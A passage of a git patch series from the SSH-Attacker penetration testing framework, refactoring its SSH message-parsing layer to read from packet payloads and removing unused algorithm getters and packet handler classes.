SSH_MSG_CHANNEL_DATA: + LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_DATA Message"); + readChannelDataMessage((BinaryPacket) packet); + return; + case SSH_MSG_CHANNEL_EXTENDED_DATA: + LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_EXTENDED_DATA Message"); + readChannelExtendedDataMessage((BinaryPacket) packet); + return; + case SSH_MSG_CHANNEL_EOF: + LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_EOF Message"); + readChannelCloseMessage((BinaryPacket) packet); + return; + case SSH_MSG_CHANNEL_CLOSE: + LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_CLOSE Message"); + readChannelCloseMessage((BinaryPacket) packet); + return; + case SSH_MSG_CHANNEL_REQUEST: + LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_REQUEST Message"); + readChannelRequest((BinaryPacket) packet); + return; case SSH_MSG_CHANNEL_SUCCESS: - readChannelSuccessMessage(); - break; - case SSH_MSG_IGNORE: - readIngoreMessage(); - break; - case SSH_MSG_KEX_ECDH_REPLY: - readKexECDHReply(); - break; - case SSH_MSG_KEX_ECDH_INIT: - readKexECDHInit(); - break; - /* Not Implementended Yet - case SSH_MSG_EXT_INFO: - readExtensionInfo(); - break;*/ + LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_SUCCESS Message"); + readChannelSuccessMessage((BinaryPacket) packet); + return; + case SSH_MSG_CHANNEL_FAILURE: + LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_FAILURE Message"); + readChannelFailureMessage((BinaryPacket) packet); + return; + case UNKNOWN: + LOGGER.debug("[bro] parsing UNKNOWN Message"); + return; default: - LOGGER.error("Undefined record layer type, found type {}", hint.getType()); - throw new RuntimeException(); - // break; + LOGGER.debug( + "[bro] cannot identifie {} as {} - parsingn null", + raw[1], + MessageIdConstant.fromId( + packet.getPayload().getValue()[0], context.getContext())); } } - private void readUserAuthReq() { + private void readUserAuthReq(AbstractPacket packet) { UserAuthUnknownMessage userAuthUnknownMessage = new UserAuthUnknownMessage(); HintedInputStream inputStream; HintedInputStream temp_stream; - try { - inputStream = getLowerLayer().getDataStream(); - } catch (IOException e) { - LOGGER.warn("The lower layer did not produce a data stream: ", e); - return; - } + inputStream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); UserAuthUnknownMessageParser parser = new UserAuthUnknownMessageParser(inputStream); parser.parse(userAuthUnknownMessage); String methodString = userAuthUnknownMessage.getMethodName().getValue(); @@ -343,17 +549,15 @@ private void readUserAuthReq() { LOGGER.info("Done with Parsing UserAuth"); } - private void readChannelRequest() { + private void readChannelRequest(AbstractPacket packet) { ChannelRequestUnknownMessage channelRequestUnknownMessage = new ChannelRequestUnknownMessage(); HintedInputStream inputStream; HintedInputStream temp_stream; - try { - inputStream = getLowerLayer().getDataStream(); - } catch (IOException e) { - LOGGER.warn("The lower layer did not produce a data stream: ", e); - return; - } + + inputStream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); ChannelRequestUnknownMessageParser parser = new ChannelRequestUnknownMessageParser(inputStream); @@ -531,16 +735,15 @@ private void readChannelRequest() { LOGGER.info("Done with Parsing UserAuth"); } - private void readGlobalRequest() { + private void readGlobalRequest(AbstractPacket packet) { GlobalRequestUnknownMessage globalRequestUnknownMessage = new GlobalRequestUnknownMessage(); HintedInputStream inputStream; HintedInputStream temp_stream; - try { - inputStream = getLowerLayer().getDataStream(); - } catch (IOException e) { - LOGGER.warn("The lower layer did not produce a data stream: ", e); - return; - } + + inputStream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + GlobalRequestUnknownMessageParser parser = new GlobalRequestUnknownMessageParser(inputStream); parser.parse(globalRequestUnknownMessage); @@ -597,81 +800,339 @@ private void readGlobalRequest() { } } - private void readASCIIData() { + private void readASCIIData(AbstractPacket packet) { AsciiMessage message = new AsciiMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readIngoreMessage() { + private void readIngoreMessage(AbstractPacket packet) { ChannelSuccessMessage message = new ChannelSuccessMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readKexECDHInit() { + private void readKexECDHInit(AbstractPacket packet) { EcdhKeyExchangeInitMessage message = new EcdhKeyExchangeInitMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readKexECDHReply() { + private void readKexECDHReply(AbstractPacket packet) { EcdhKeyExchangeReplyMessage message = new EcdhKeyExchangeReplyMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readChannelSuccessMessage() { + private void readChannelSuccessMessage(AbstractPacket packet) { ChannelSuccessMessage message = new ChannelSuccessMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readChannelCloseMessage() { + private void readChannelCloseMessage(AbstractPacket packet) { ChannelCloseMessage message = new ChannelCloseMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readChannelEofMessage() { + private void readChannelEofMessage(AbstractPacket packet) { ChannelEofMessage message = new ChannelEofMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readChannelExtendedDataMessage() { + private void readChannelExtendedDataMessage(AbstractPacket packet) { ChannelExtendedDataMessage message = new ChannelExtendedDataMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readChannelFailureMessage() { + private void readChannelFailureMessage(AbstractPacket packet) { ChannelFailureMessage message = new ChannelFailureMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readChannelOpenFailureMessage() { + private void readChannelOpenFailureMessage(AbstractPacket packet) { ChannelOpenFailureMessage message = new ChannelOpenFailureMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readChannelOpenConfirmation() { + private void readChannelOpenConfirmation(AbstractPacket packet) { ChannelOpenConfirmationMessage message = new ChannelOpenConfirmationMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readUserAuthSucc() { + private void readUserAuthSucc(AbstractPacket packet) { UserAuthSuccessMessage message = new UserAuthSuccessMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readDisconnect(AbstractPacket packet) { + DisconnectMessage message = new DisconnectMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readGexDHExchangeOldRequest(AbstractPacket packet) { + DhGexKeyExchangeOldRequestMessage message = new DhGexKeyExchangeOldRequestMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readGexKeyExchangeGroup(AbstractPacket packet) { + DhGexKeyExchangeGroupMessage message = new DhGexKeyExchangeGroupMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readGexDHExchangeRequest(AbstractPacket packet) { + DhGexKeyExchangeRequestMessage message = new DhGexKeyExchangeRequestMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readUserAuthFail(AbstractPacket packet) { + UserAuthFailureMessage message = new UserAuthFailureMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readGexDHExchangeInitMessage(AbstractPacket packet) { + DhGexKeyExchangeInitMessage message = new DhGexKeyExchangeInitMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readDhKeyInitMessage(AbstractPacket packet) { + DhKeyExchangeInitMessage message = new DhKeyExchangeInitMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readDhKeyReplyMessage(AbstractPacket packet) { + DhKeyExchangeReplyMessage message = new DhKeyExchangeReplyMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readGexDHExchangeReplyMessage(AbstractPacket packet) { + DhGexKeyExchangeReplyMessage message = new DhGexKeyExchangeReplyMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readKeyExchangeRSAPubkeyMessage(AbstractPacket packet) { + RsaKeyExchangePubkeyMessage message = new RsaKeyExchangePubkeyMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readKeyExchangeRSASecret(AbstractPacket packet) { + RsaKeyExchangeSecretMessage message = new RsaKeyExchangeSecretMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readServiceRequestData() { + private void readKeyExchangeRSADone(AbstractPacket packet) { + RsaKeyExchangeDoneMessage message = new RsaKeyExchangeDoneMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readUserAuthBanner(AbstractPacket packet) { + UserAuthBannerMessage message = new UserAuthBannerMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readUserAuthInfoReq(AbstractPacket packet) { + UserAuthInfoRequestMessage message = new UserAuthInfoRequestMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readUserAuthInfoResp(AbstractPacket packet) { + UserAuthInfoResponseMessage message = new UserAuthInfoResponseMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readRequestSuccess(AbstractPacket packet) { + GlobalRequestSuccessMessage message = new GlobalRequestSuccessMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readRequestFailure(AbstractPacket packet) { + GlobalRequestFailureMessage message = new GlobalRequestFailureMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readChannelWindowsAdjust(AbstractPacket packet) { + ChannelWindowAdjustMessage message = new ChannelWindowAdjustMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readChannelDataMessage(AbstractPacket packet) { + ChannelDataMessage message = new ChannelDataMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readServiceRequestData(AbstractPacket packet) { ServiceRequestMessage message = new ServiceRequestMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readChannelOpen() { + private void readChannelOpen(AbstractPacket packet) { ChannelOpenUnknownMessage channelOpenUnknownMessage = new ChannelOpenUnknownMessage(); HintedInputStream inputStream; HintedInputStream temp_stream; - try { + inputStream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + /* try { inputStream = getLowerLayer().getDataStream(); } catch (IOException e) { LOGGER.warn("The lower layer did not produce a data stream: ", e); return; - } + }*/ ChannelOpenUnknownMessageParser parser = new ChannelOpenUnknownMessageParser(inputStream); parser.parse(channelOpenUnknownMessage); String channelTypeString = channelOpenUnknownMessage.getChannelType().getValue(); @@ -694,34 +1155,65 @@ private void readChannelOpen() { } } - private void readMsgServiceAccept() { + private void readMsgServiceAccept(AbstractPacket packet) { ServiceAcceptMessage message = new ServiceAcceptMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readHbrReplProtocolData() { + private void readHbrReplProtocolData(AbstractPacket packet) { HybridKeyExchangeReplyMessage message = new HybridKeyExchangeReplyMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readNewKeysProtocolData() { + private void readNewKeysProtocolData(AbstractPacket packet) { NewKeysMessage message = new NewKeysMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readKexInitProtocolData() { + private void readKexInitProtocolData(AbstractPacket packet) { KeyExchangeInitMessage message = new KeyExchangeInitMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readHbrInitProtocolData() { + private void readHbrInitProtocolData(AbstractPacket packet) { HybridKeyExchangeInitMessage message = new HybridKeyExchangeInitMessage(); - readDataContainer(message, context); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } - private void readVersionExchangeProtocolData() { + private void readVersionExchangeProtocolData(AbstractPacket packet) { VersionExchangeMessage message = new VersionExchangeMessage(); - readDataContainer(message, context); + + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); } /** diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java index 5117bb77b..252e54912 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java @@ -159,6 +159,8 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { * byte[n] ciphertext ; n = 4 + packet_length (decryption of first block required) * byte[m] mac ; m = length of mac output */ + + LOGGER.debug("I can mark: {}", getStream().markSupported()); // int pointer = getPointer(); int blockSize = activeDecryptCipher.getEncryptionAlgorithm().getBlockSize(); int decryptedByteCount = 0; From cc6ec1abb82a9448714c8c90affe504f555c89b8 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Mon, 14 Aug 2023 21:33:50 +0200 Subject: [PATCH 062/176] Removed unnecessary "GetSelectedEncryption", "GetSelectedMAC", "GetSelectedCompression" Methods --- .../core/layer/context/SshContext.java | 38 ------------------- .../core/workflow/chooser/Chooser.java | 8 ---- .../core/workflow/chooser/DefaultChooser.java | 32 ---------------- 3 files changed, 78 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index 0dd928271..42831abad 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -260,44 +260,6 @@ public void setLastHandledApplicationMessageData(byte[] lastHandledApplicationMe private byte[] lastHandledApplicationMessageData; - private CompressionAlgorithm selectedCompressionAlgorithm; - - public CompressionAlgorithm getSelectedCompressionAlgorithm() { - return selectedCompressionAlgorithm; - } - - public void setSelectedCompressionAlgorithm(CompressionAlgorithm selectedCompressionAlgorithm) { - this.selectedCompressionAlgorithm = selectedCompressionAlgorithm; - } - - public EncryptionAlgorithm getSelectedEncryptionAlgorithm() { - return selectedEncryptionAlgorithm; - } - - public void setSelectedEncryptionAlgorithm(EncryptionAlgorithm selectedEncryptionAlgorithm) { - this.selectedEncryptionAlgorithm = selectedEncryptionAlgorithm; - } - - public MacAlgorithm getSelectedMacAlgorithm() { - return selectedMacAlgorithm; - } - - public void setSelectedMacAlgorithm(MacAlgorithm selectedMacAlgorithm) { - this.selectedMacAlgorithm = selectedMacAlgorithm; - } - - public KeyExchangeAlgorithm getSelectedKeyExchangeAlgorithm() { - return selectedKeyExchangeAlgorithm; - } - - public void setSelectedKeyExchangeAlgorithm(KeyExchangeAlgorithm selectedKeyExchangeAlgorithm) { - this.selectedKeyExchangeAlgorithm = selectedKeyExchangeAlgorithm; - } - - private EncryptionAlgorithm selectedEncryptionAlgorithm; - private MacAlgorithm selectedMacAlgorithm; - private KeyExchangeAlgorithm selectedKeyExchangeAlgorithm; - // region Constructors and Initalization public SshContext() { this(new Context(new Config())); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java index eb42abf0a..cad7ea33c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java @@ -245,12 +245,4 @@ public CompressionMethod getReceiveCompressionMethod() { public abstract ConnectionEndType getConnectionEndType(); public abstract Connection getConnection(); - - public abstract CompressionAlgorithm getSelectedCompressionAlgorithm(); - - public abstract EncryptionAlgorithm getSelectedEncryptionAlgorithm(); - - public abstract MacAlgorithm getSelectedMacAlgorithm(); - - public abstract KeyExchangeAlgorithm getSelectedKeyExchangeAlgorithm(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java index d2aaf0a42..95b1ad09e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java @@ -1053,36 +1053,4 @@ public Integer getMaximalDhGroupSize() { public AuthenticationMethod getAuthenticationMethod() { return config.getAuthenticationMethod(); } - - public CompressionAlgorithm getSelectedCompressionAlgorithm() { - if (context.getSshContext().getSelectedCompressionAlgorithm() != null) { - return context.getSshContext().getSelectedCompressionAlgorithm(); - } else { - return config.getDefaultSelectedCompressionAlgorithm(); - } - } - - public EncryptionAlgorithm getSelectedEncryptionAlgorithm() { - if (context.getSshContext().getSelectedEncryptionAlgorithm() != null) { - return context.getSshContext().getSelectedEncryptionAlgorithm(); - } else { - return config.getDefaultSelectedEncryptionAlgorithm(); - } - } - - public MacAlgorithm getSelectedMacAlgorithm() { - if (context.getSshContext().getSelectedMacAlgorithm() != null) { - return context.getSshContext().getSelectedMacAlgorithm(); - } else { - return config.getDefaultSelectedMacAlgorithm(); - } - } - - public KeyExchangeAlgorithm getSelectedKeyExchangeAlgorithm() { - if (context.getSshContext().getSelectedMacAlgorithm() != null) { - return context.getSshContext().getSelectedKeyExchangeAlgorithm(); - } else { - return config.getDefaultSelectedKeyExchangeAlgorithm(); - } - } } From e770df54ad8b6c351c7d56fa73588af81512ab5d Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Mon, 14 Aug 2023 21:54:59 +0200 Subject: [PATCH 063/176] Remove unused handler for Binary- and Blobpacket --- .../sshattacker/core/packet/BinaryPacket.java | 24 ++--------------- .../sshattacker/core/packet/BlobPacket.java | 26 +++---------------- .../packet/handler/AbstractPacketHandler.java | 22 ---------------- .../packet/handler/BinaryPacketHandler.java | 21 --------------- .../packet/handler/BlobPacketHandler.java | 21 --------------- 5 files changed, 5 insertions(+), 109 deletions(-) delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandler.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BlobPacketHandler.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java index 0bca48c9d..cab736304 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java @@ -14,7 +14,6 @@ import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.data.*; -import de.rub.nds.sshattacker.core.packet.handler.BinaryPacketHandler; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; import de.rub.nds.sshattacker.core.packet.preparator.BinaryPacketPreparator; import de.rub.nds.sshattacker.core.packet.serializer.BinaryPacketSerializer; @@ -121,25 +120,6 @@ public void setSequenceNumber(int sequenceNumber) { this.sequenceNumber = ModifiableVariableFactory.safelySetValue(this.sequenceNumber, sequenceNumber); } - /* - @Override - public BinaryPacketPreparator getPacketPreparator( - Chooser chooser, AbstractPacketEncryptor encryptor, PacketCompressor compressor) { - return new BinaryPacketPreparator(chooser, this, encryptor, compressor); - } - - */ - /* @Override - public BinaryPacketParser getPacketParser( - byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber) { - return new BinaryPacketParser(array, startPosition, activeDecryptCipher, sequenceNumber); - }*/ - /* - - @Override - public BinaryPacketSerializer getPacketSerializer() { - return new BinaryPacketSerializer(this); - }*/ public PacketCryptoComputations getComputations() { return computations; @@ -207,7 +187,7 @@ public BinaryPacketSerializer getSerializer(SshContext context) { } @Override - public BinaryPacketHandler getHandler(SshContext context) { - return new BinaryPacketHandler(context); + public Handler getHandler(SshContext context) { + throw new UnsupportedOperationException("Not supported yet."); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java index e4ffeacbf..1bec40d1a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java @@ -8,33 +8,13 @@ package de.rub.nds.sshattacker.core.packet; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.handler.BlobPacketHandler; +import de.rub.nds.sshattacker.core.layer.data.Handler; import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; import de.rub.nds.sshattacker.core.packet.preparator.BlobPacketPreparator; import de.rub.nds.sshattacker.core.packet.serializer.BlobPacketSerializer; import java.io.InputStream; public class BlobPacket extends AbstractPacket { - /* - @Override - public BlobPacketPreparator getPacketPreparator( - Chooser chooser, AbstractPacketEncryptor encryptor, PacketCompressor compressor) { - return new BlobPacketPreparator(chooser, this, encryptor, compressor); - } - - @Override - public BlobPacketParser getPacketParser( - byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber) { - return new BlobPacketParser(array, startPosition); - } - */ - - /* - @Override - public BlobPacketSerializer getPacketSerializer() { - return new BlobPacketSerializer(this); - } - */ @Override public void prepareComputations() {} @@ -56,7 +36,7 @@ public BlobPacketSerializer getSerializer(SshContext context) { } @Override - public BlobPacketHandler getHandler(SshContext context) { - return new BlobPacketHandler(context); + public Handler getHandler(SshContext context) { + throw new UnsupportedOperationException("Not supported yet."); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java deleted file mode 100644 index fb7a2b77d..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java +++ /dev/null @@ -1,22 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.packet.handler; - -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.layer.data.Handler; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; - -public abstract class AbstractPacketHandler> - implements Handler { - - protected SshContext sshContext = null; - - public AbstractPacketHandler(SshContext sshContext) { - this.sshContext = sshContext; - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandler.java deleted file mode 100644 index cd328befe..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandler.java +++ /dev/null @@ -1,21 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.packet.handler; - -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.BinaryPacket; - -public class BinaryPacketHandler extends AbstractPacketHandler { - - public BinaryPacketHandler(SshContext context) { - super(context); - } - - @Override - public void adjustContext(BinaryPacket object) {} -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BlobPacketHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BlobPacketHandler.java deleted file mode 100644 index d71f6d6ba..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BlobPacketHandler.java +++ /dev/null @@ -1,21 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.packet.handler; - -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.BlobPacket; - -public class BlobPacketHandler extends AbstractPacketHandler { - - public BlobPacketHandler(SshContext context) { - super(context); - } - - @Override - public void adjustContext(BlobPacket object) {} -} From 750d52d520a5e4efa99cdc215923199c425c030a Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Mon, 14 Aug 2023 22:01:10 +0200 Subject: [PATCH 064/176] Remove old "LastHandeltAuthenticationMethod" Lefovers --- .../sshattacker/core/layer/context/SshContext.java | 10 ---------- 